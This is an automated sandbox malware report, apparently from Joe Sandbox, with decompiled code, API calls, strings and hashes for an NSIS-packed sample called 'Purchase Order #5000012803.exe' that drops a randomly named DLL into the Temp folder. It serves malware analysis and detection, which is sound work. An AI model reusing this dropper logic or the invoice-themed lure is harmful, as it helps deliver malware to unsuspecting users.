                      control_flow_graph 177 402c5b-402ca9 GetTickCount GetModuleFileNameA call 40575c 180 402cb5-402ce3 call 405a85 call 4055bf call 405a85 GetFileSize 177->180 181 402cab-402cb0 177->181 189 402dd3-402de1 call 402bc5 180->189 190 402ce9-402d00 180->190 182 402efa-402efe 181->182 197 402eb2-402eb7 189->197 198 402de7-402dea 189->198 192 402d02 190->192 193 402d04-402d0a call 4031a8 190->193 192->193 196 402d0f-402d11 193->196 199 402d17-402d1d 196->199 200 402e6e-402e76 call 402bc5 196->200 197->182 201 402e16-402e62 GlobalAlloc call 405e7d call 40578b CreateFileA 198->201 202 402dec-402dfd call 4031da call 4031a8 198->202 203 402d9d-402da1 199->203 204 402d1f-402d37 call 40571d 199->204 200->197 228 402e64-402e69 201->228 229 402e78-402ea8 call 4031da call 402f01 201->229 224 402e02-402e04 202->224 212 402da3-402da9 call 402bc5 203->212 213 402daa-402db0 203->213 204->213 222 402d39-402d40 204->222 212->213 215 402db2-402dc0 call 405e0f 213->215 216 402dc3-402dcd 213->216 215->216 216->189 216->190 222->213 227 402d42-402d49 222->227 224->197 225 402e0a-402e10 224->225 225->197 225->201 227->213 230 402d4b-402d52 227->230 228->182 237 402ead-402eb0 229->237 230->213 232 402d54-402d5b 230->232 232->213 234 402d5d-402d7d 232->234 234->197 236 402d83-402d87 234->236 238 402d89-402d8d 236->238 239 402d8f-402d97 236->239 237->197 240 402eb9-402eca 237->240 238->189 238->239 239->213 243 402d99-402d9b 239->243 241 402ed2-402ed7 240->241 242 402ecc 240->242 244 402ed8-402ede 241->244 242->241 243->213 244->244 245 402ee0-402ef8 call 40571d 244->245 245->182
                      C-Code - Quality: 96%
                      			E00402C5B(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				signed int _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				signed int _t101;
				signed int _t103;
				void* _t105;
				signed int _t106;
				signed int _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423eac = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\Purchase Order #5000012803.exe", 0x400);
				_t105 = E0040575C("C:\\Users\\jones\\Desktop\\Purchase Order #5000012803.exe", 0x80000000, 3);
				 *0x409010 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405A85("C:\\Users\\jones\\Desktop", "C:\\Users\\jones\\Desktop\\Purchase Order #5000012803.exe");
				E00405A85(0x42b000, E004055BF("C:\\Users\\jones\\Desktop"));
				_t54 = GetFileSize(_t105, 0);
				__eflags = _t54;
				 *0x41f048 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BC5(1);
					__eflags =  *0x423eb4;
					if( *0x423eb4 == 0) {
						goto L30;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E00405E7D(0x40afb0);
						E0040578B( &_v300, "C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x409014 = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004031DA( *0x423eb4 + 0x1c);
							 *0x41f04c = _t65;
							 *0x417040 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00402F01(_v16, 0xffffffff, 0, _t110, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x423eb0 = _t110;
								 *0x423eb8 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423ebc =  *0x423ebc + 1;
									__eflags =  *0x423ebc;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
									__eflags = _t101;
								} while (_t101 != 0);
								_t71 =  *0x41703c; // 0x3f276
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E0040571D(0x423ec0, _t110 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004031DA( *0x417038);
					_t77 = E004031A8( &_a4, 4); // executed
					__eflags = _t77;
					if(_t77 == 0) {
						goto L30;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L30;
					}
					goto L26;
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x423eb4) & 0x00007e00) + 0x200;
						__eflags = _t109 - _t82;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004031A8(0x417048, _t106); // executed
						__eflags = _t83;
						if(_t83 == 0) {
							E00402BC5(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x423eb4;
						if( *0x423eb4 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BC5(0);
							}
							goto L19;
						}
						E0040571D( &_v40, 0x417048, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L19;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L19;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L19;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L19;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L19;
						}
						_a4 = _a4 | _t89;
						_t103 =  *0x417038; // 0x310f2
						 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t109;
						 *0x423eb4 = _t103;
						if(_t92 > _t109) {
							goto L30;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t109 = _t92 - 4;
							__eflags = _t106 - _t109;
							if(_t106 > _t109) {
								_t106 = _t109;
							}
							goto L19;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							goto L22;
						}
						goto L15;
						L19:
						__eflags = _t109 -  *0x41f048; // 0x32abc
						if(__eflags < 0) {
							_v8 = E00405E0F(_v8, 0x417048, _t106);
						}
						 *0x417038 =  *0x417038 + _t106;
						_t109 = _t109 - _t106;
						__eflags = _t109;
					} while (_t109 > 0);
					goto L22;
				}
			}































                      0x00402c69
                      0x00402c6c
                      0x00402c86
                      0x00402c8b
                      0x00402c9e
                      0x00402ca3
                      0x00402ca9
                      0x00000000
                      0x00402cab
                      0x00402cbc
                      0x00402ccd
                      0x00402cd4
                      0x00402cda
                      0x00402cdc
                      0x00402ce1
                      0x00402ce3
                      0x00402dd3
                      0x00402dd5
                      0x00402dda
                      0x00402de1
                      0x00000000
                      0x00000000
                      0x00402de7
                      0x00402dea
                      0x00402e16
                      0x00402e1b
                      0x00402e26
                      0x00402e28
                      0x00402e39
                      0x00402e54
                      0x00402e5a
                      0x00402e5d
                      0x00402e62
                      0x00402e81
                      0x00402e91
                      0x00402ea3
                      0x00402ea8
                      0x00402ead
                      0x00402eb0
                      0x00402eb9
                      0x00402ebd
                      0x00402ec5
                      0x00402eca
                      0x00402ecc
                      0x00402ecc
                      0x00402ecc
                      0x00402ed4
                      0x00402ed4
                      0x00402ed7
                      0x00402ed8
                      0x00402ed8
                      0x00402edb
                      0x00402edd
                      0x00402edd
                      0x00402edd
                      0x00402ee0
                      0x00402ee7
                      0x00402ef3
                      0x00402ef8
                      0x00000000
                      0x00402ef8
                      0x00000000
                      0x00402eb0
                      0x00000000
                      0x00402e64
                      0x00402df2
                      0x00402dfd
                      0x00402e02
                      0x00402e04
                      0x00000000
                      0x00000000
                      0x00402e0d
                      0x00402e10
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00402ce9
                      0x00402ce9
                      0x00402cee
                      0x00402cf2
                      0x00402cf9
                      0x00402cfe
                      0x00402d00
                      0x00402d02
                      0x00402d02
                      0x00402d0a
                      0x00402d0f
                      0x00402d11
                      0x00402e70
                      0x00402eb2
                      0x00000000
                      0x00402eb2
                      0x00402d17
                      0x00402d1d
                      0x00402d9d
                      0x00402da1
                      0x00402da4
                      0x00402da9
                      0x00000000
                      0x00402da1
                      0x00402d2a
                      0x00402d2f
                      0x00402d32
                      0x00402d37
                      0x00000000
                      0x00000000
                      0x00402d39
                      0x00402d40
                      0x00000000
                      0x00000000
                      0x00402d42
                      0x00402d49
                      0x00000000
                      0x00000000
                      0x00402d4b
                      0x00402d52
                      0x00000000
                      0x00000000
                      0x00402d54
                      0x00402d5b
                      0x00000000
                      0x00000000
                      0x00402d5d
                      0x00402d63
                      0x00402d6c
                      0x00402d72
                      0x00402d75
                      0x00402d77
                      0x00402d7d
                      0x00000000
                      0x00000000
                      0x00402d83
                      0x00402d87
                      0x00402d8f
                      0x00402d8f
                      0x00402d92
                      0x00402d95
                      0x00402d97
                      0x00402d99
                      0x00402d99
                      0x00000000
                      0x00402d97
                      0x00402d89
                      0x00402d8d
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00402daa
                      0x00402daa
                      0x00402db0
                      0x00402dc0
                      0x00402dc0
                      0x00402dc3
                      0x00402dc9
                      0x00402dcb
                      0x00402dcb
                      0x00000000
                      0x00402ce9

                      APIs
                      • GetTickCount.KERNEL32 ref: 00402C6F
                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order #5000012803.exe,00000400), ref: 00402C8B
                        • Part of subcall function 0040575C: GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\Purchase Order #5000012803.exe,80000000,00000003), ref: 00405760
                        • Part of subcall function 0040575C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                      • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order #5000012803.exe,C:\Users\user\Desktop\Purchase Order #5000012803.exe,80000000,00000003), ref: 00402CD4
                      • GlobalAlloc.KERNELBASE(00000040,00409128), ref: 00402E1B
                      Strings
                      • C:\Users\user\Desktop, xrefs: 00402CB6, 00402CBB, 00402CC1
                      • soft, xrefs: 00402D4B
                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5B, 00402E33
                      • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E64
                      • Error launching installer, xrefs: 00402CAB
                      • Null, xrefs: 00402D54
                      • "C:\Users\user\Desktop\Purchase Order #5000012803.exe" , xrefs: 00402C68
                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EB2
                      • C:\Users\user\Desktop\Purchase Order #5000012803.exe, xrefs: 00402C75, 00402C84, 00402C98, 00402CB5
                      • Inst, xrefs: 00402D42
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                      • String ID: "C:\Users\user\Desktop\Purchase Order #5000012803.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Purchase Order #5000012803.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                      • API String ID: 2803837635-400477893
                      • Opcode ID: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                      • Instruction ID: 3eb6007c32f8468fb795c2e80af6b0be0f5756db52a0f0690052116b0cd8de19
                      • Opcode Fuzzy Hash: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                      • Instruction Fuzzy Hash: 5B61E231A40204ABDB219F64DE89B9A7BB8AF04315F10417BF905B72D1D7BC9E858B9C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00401734, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 317 401734-401757 call 4029e8 call 4055e5 322 401761-401773 call 405a85 call 405578 lstrcatA 317->322 323 401759-40175f call 405a85 317->323 328 401778-40177e call 405ce3 322->328 323->328 333 401783-401787 328->333 334 401789-401793 call 405d7c 333->334 335 4017ba-4017bd 333->335 342 4017a5-4017b7 334->342 343 401795-4017a3 CompareFileTime 334->343 337 4017c5-4017e1 call 40575c 335->337 338 4017bf-4017c0 call 40573d 335->338 345 4017e3-4017e6 337->345 346 401859-401882 call 404e23 call 402f01 337->346 338->337 342->335 343->342 347 4017e8-40182a call 405a85 * 2 call 405aa7 call 405a85 call 405346 345->347 348 40183b-401845 call 404e23 345->348 358 401884-401888 346->358 359 40188a-401896 SetFileTime 346->359 347->333 381 401830-401831 347->381 360 40184e-401854 348->360 358->359 363 40189c-4018a7 FindCloseChangeNotification 358->363 359->363 364 402886 360->364 367 40287d-402880 363->367 368 4018ad-4018b0 363->368 366 402888-40288c 364->366 367->364 370 4018b2-4018c3 call 405aa7 lstrcatA 368->370 371 4018c5-4018c8 call 405aa7 368->371 377 4018cd-402205 call 405346 370->377 371->377 377->366 384 40264e-402655 377->384 381->360 383 401833-401834 381->383 383->348 384->367
                      C-Code - Quality: 75%
                      			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029E8(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E004055E5(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405578(E00405A85(0x409b68, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409b68);
					E00405A85();
				}
				E00405CE3(0x409b68);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405D7C(0x409b68);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040573D(0x409b68);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040575C(0x409b68, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404E23(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423f28;
						goto L32;
					} else {
						E00405A85(0x40a368, 0x424000);
						E00405A85(0x424000, 0x409b68);
						E00405AA7(_t75, 0x40a368, 0x409b68, "C:\Users\jones\AppData\Local\Temp\nsgB0E.tmp\ibqwlwmewvj.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E00405A85(0x424000, 0x40a368);
						_t62 = E00405346("C:\Users\jones\AppData\Local\Temp\nsgB0E.tmp\ibqwlwmewvj.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b68);
								_push(0xfffffffa);
								E00404E23();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404E23(0xffffffea,  *(_t85 - 8));
				 *0x423f54 =  *0x423f54 + 1;
				_t43 = E00402F01(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
				 *0x423f54 =  *0x423f54 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffee);
					} else {
						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffe9);
						lstrcatA(0x409b68,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b68);
					E00405346();
					goto L29;
				}
				goto L33;
			}
















                      0x00401734
                      0x0040173b
                      0x00401744
                      0x00401747
                      0x0040174a
                      0x0040174f
                      0x00401757
                      0x00401773
                      0x00401759
                      0x00401759
                      0x0040175a
                      0x0040175a
                      0x00401779
                      0x00401783
                      0x00401783
                      0x00401787
                      0x0040178a
                      0x0040178f
                      0x00401791
                      0x00401793
                      0x00401798
                      0x00401798
                      0x004017a3
                      0x004017a3
                      0x004017b4
                      0x004017b6
                      0x004017b6
                      0x004017b7
                      0x004017b7
                      0x004017ba
                      0x004017bd
                      0x004017c0
                      0x004017c0
                      0x004017c7
                      0x004017d6
                      0x004017db
                      0x004017de
                      0x004017e1
                      0x00000000
                      0x00000000
                      0x004017e3
                      0x004017e6
                      0x00401840
                      0x00401845
                      0x004015a8
                      0x0040264e
                      0x0040264e
                      0x0040287d
                      0x00402880
                      0x00402880
                      0x00000000
                      0x004017e8
                      0x004017ee
                      0x004017f9
                      0x00401806
                      0x00401811
                      0x00401827
                      0x00401827
                      0x0040182a
                      0x00000000
                      0x00401830
                      0x00401830
                      0x00401831
                      0x0040184e
                      0x00402886
                      0x00402886
                      0x00402886
                      0x00401833
                      0x00401833
                      0x00401834
                      0x00401492
                      0x00402200
                      0x00402200
                      0x00402200
                      0x00401831
                      0x0040182a
                      0x00402888
                      0x0040288c
                      0x0040288c
                      0x0040185e
                      0x00401863
                      0x00401871
                      0x00401876
                      0x0040187c
                      0x00401880
                      0x00401882
                      0x0040188a
                      0x00401896
                      0x00401884
                      0x00401884
                      0x00401888
                      0x00000000
                      0x00000000
                      0x00401888
                      0x0040189f
                      0x004018a5
                      0x004018a7
                      0x00000000
                      0x004018ad
                      0x004018ad
                      0x004018b0
                      0x004018c8
                      0x004018b2
                      0x004018b5
                      0x004018be
                      0x004018be
                      0x004018cd
                      0x004018d2
                      0x004021fb
                      0x00000000
                      0x004021fb
                      0x00000000

                      APIs
                      • lstrcatA.KERNEL32(00000000,00000000,icluciob,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                      • CompareFileTime.KERNEL32(-00000014,?,icluciob,icluciob,00000000,00000000,icluciob,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                        • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,004236A0,NSIS Error), ref: 00405A92
                        • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                        • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                        • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                        • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                        • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EB7
                        • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404ED1
                        • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EDF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                      • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsgB0E.tmp$C:\Users\user\AppData\Local\Temp\nsgB0E.tmp\ibqwlwmewvj.dll$icluciob
                      • API String ID: 1941528284-1666323670
                      • Opcode ID: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                      • Instruction ID: c3a7f6530b99602e8ac3371ca3d410005e8cb954db153f1edc9c693d5e31c606
                      • Opcode Fuzzy Hash: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                      • Instruction Fuzzy Hash: 4541AD31A00515BACB10BBB5DD86DAF3679EF45369B20433BF511B20E1D77C8A418EAE
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00402F01, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109fileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 385 402f01-402f10 386 402f12-402f28 SetFilePointer 385->386 387 402f2e-402f39 call 40302c 385->387 386->387 390 403025-403029 387->390 391 402f3f-402f59 ReadFile 387->391 392 403022 391->392 393 402f5f-402f62 391->393 395 403024 392->395 393->392 394 402f68-402f7b call 40302c 393->394 394->390 398 402f81-402f84 394->398 395->390 399 402ff1-402ff7 398->399 400 402f86-402f89 398->400 401 402ff9 399->401 402 402ffc-40300f ReadFile 399->402 403 40301d-403020 400->403 404 402f8f 400->404 401->402 402->392 405 403011-40301a 402->405 403->390 406 402f94-402f9c 404->406 405->403 407 402fa1-402fb3 ReadFile 406->407 408 402f9e 406->408 407->392 409 402fb5-402fb8 407->409 408->407 409->392 410 402fba-402fcf WriteFile 409->410 411 402fd1-402fd4 410->411 412 402fed-402fef 410->412 411->412 413 402fd6-402fe9 411->413 412->395 413->406 414 402feb 413->414 414->403
                      C-Code - Quality: 93%
                      			E00402F01(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t44 = _t31 +  *0x423ef8;
					 *0x41703c = _t44;
					SetFilePointer( *0x409014, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E0040302C(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409014,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x41703c =  *0x41703c + _t57;
						_t32 = E0040302C(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409014, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x41703c =  *0x41703c + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409014, 0x413038, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413038, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x41703c =  *0x41703c + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}

















                      0x00402f06
                      0x00402f10
                      0x00402f19
                      0x00402f1d
                      0x00402f28
                      0x00402f28
                      0x00402f30
                      0x00402f32
                      0x00402f39
                      0x00402f55
                      0x00402f59
                      0x00403022
                      0x00403022
                      0x00000000
                      0x00402f68
                      0x00402f6b
                      0x00402f71
                      0x00402f78
                      0x00402f7b
                      0x00402f84
                      0x00402ff1
                      0x00402ff7
                      0x00402ff9
                      0x00402ff9
                      0x0040300b
                      0x0040300f
                      0x00000000
                      0x00403011
                      0x00403011
                      0x00403014
                      0x0040301a
                      0x00000000
                      0x0040301a
                      0x00402f86
                      0x00402f89
                      0x0040301d
                      0x0040301d
                      0x00402f8f
                      0x00402f94
                      0x00402f94
                      0x00402f9c
                      0x00402f9e
                      0x00402f9e
                      0x00402faf
                      0x00402fb3
                      0x00000000
                      0x00000000
                      0x00402fc7
                      0x00402fcf
                      0x00402fed
                      0x00403024
                      0x00403024
                      0x00402fd6
                      0x00402fd6
                      0x00402fd9
                      0x00402fdc
                      0x00402fdf
                      0x00402fe9
                      0x00000000
                      0x00402feb
                      0x00000000
                      0x00402feb
                      0x00402fe9
                      0x00000000
                      0x00402fcf
                      0x00000000
                      0x00402f94
                      0x00402f89
                      0x00402f84
                      0x00402f7b
                      0x00402f59
                      0x00403025
                      0x00403029

                      APIs
                      • SetFilePointer.KERNELBASE(00409128,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402F28
                      • ReadFile.KERNELBASE(00409128,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128), ref: 00402F55
                      • ReadFile.KERNELBASE(00413038,00004000,?,00000000,00409128,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402FAF
                      • WriteFile.KERNELBASE(00000000,00413038,?,000000FF,00000000,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402FC7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: File$Read$PointerWrite
